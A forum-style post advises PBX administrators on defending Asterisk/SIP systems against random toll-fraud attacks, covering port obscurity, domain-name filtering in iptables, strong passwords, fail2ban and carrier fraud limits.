To start, it’s useful to know a little about the enemy. Attacks may be random, or targeting your system specifically.
Random attacks use automated tools to probe every IPv4 address. When something promising is found, a smarter robot and/or human skill is applied in an attempt to complete penetration. The motive is usually one of:
- Steal phone service, e.g. for resale in internet cafes or taxiphone shops.
- Make calls to premium numbers controlled by the attacker.
- For telemarketing spam or scam calls.
- To mask communications used in planning or executing an unrelated crime.
Targeted attackers generally have no interest in toll fraud. Examples include:
- A competitor tries to obtain your customer list, designs, business plans or other IP.
- A disgruntled current or former employee seeks to sabotage your business.
- Your wife searches for your communications with your mistress.
The security playing field is overwhelmingly tilted in favor of the attacker. Your defense must succeed every time, but he has to succeed only once. An attacker with sufficient expertise and/or funds will surely breach your system. If you need to defend against a targeted attack, get professional assistance. Nothing that we discuss here will be adequate. The remainder of this post is about random attacks.
It is infeasible, even with a large botnet, to probe every port in IPv4 space. So, using an obscure SIP port can certainly help; in my experience it will reduce unwanted traffic by at least 95%. But, be careful: if your PBX previously responded to an attacker on port 5060, changing the port (with the same IP) won’t help; he’ll scan every port on your machine. Likewise, if your IAX port (or heaven forbid, your web admin port) is open, he knows you have a PBX and will probe all ports for SIP.
Filtering by domain name is very powerful. My preference is to do this in iptables rather than Asterisk. An attacker sending REGISTER, INVITE or OPTIONS without the ‘secret’ domain name gets no response at all; after a few attempts he moves on to the next sucker. Also, it’s more flexible because you can whitelist addresses of trunking providers who will use your numeric IP address. Choose an obscure name and be sure that a reverse lookup yields something different. See for example
Once past the above defenses, the bad guys send two kinds of traffic: attempts to register an extension, and calls to numbers that might route externally. For the former, be sure that every extension has a password strong enough to resist offline cracking; there are several ways that he might have the hashed password. For the latter, be sure that anonymous and guest calls are disallowed and (in case he gets past that) the from-trunk and similar contexts have no path to an arbitrary external number. (You should also check for DISA, voicemail and attended transfer vulnerabilities, though an attacker would not need SIP access to exploit them.)
Fail2ban rarely prevents an actual breach – if the password is known, the bad guy gets in, if not (and it’s strong) a billion attempts won’t help him. However, it’s useful for alerting you to problems earlier in the chain, for reducing unwanted load on the system, and for removing log clutter that could prevent you from spotting other trouble.
In case all of the above fail, having some restrictions in the system is useful, e.g. blocking countries that you don’t normally call, or protecting those routes with a password.
Also, take advantage of the fraud controls offered by your trunking providers. To protect their own network, there are typically limits on number of concurrent calls, calls per second and maximum monthly spend. If higher than you need, ask them to reduce the limits for your account. If you auto-recharge, there may be an option to limit the frequency. You may also have the option to block calls exceeding a specified per-minute rate, or calls to specific regions or countries. And, if they have a ‘minimum balance for outgoing calls’, set that high enough so that if all hell breaks loose and your account is drained, your incoming calls will still work while you resolve the issue.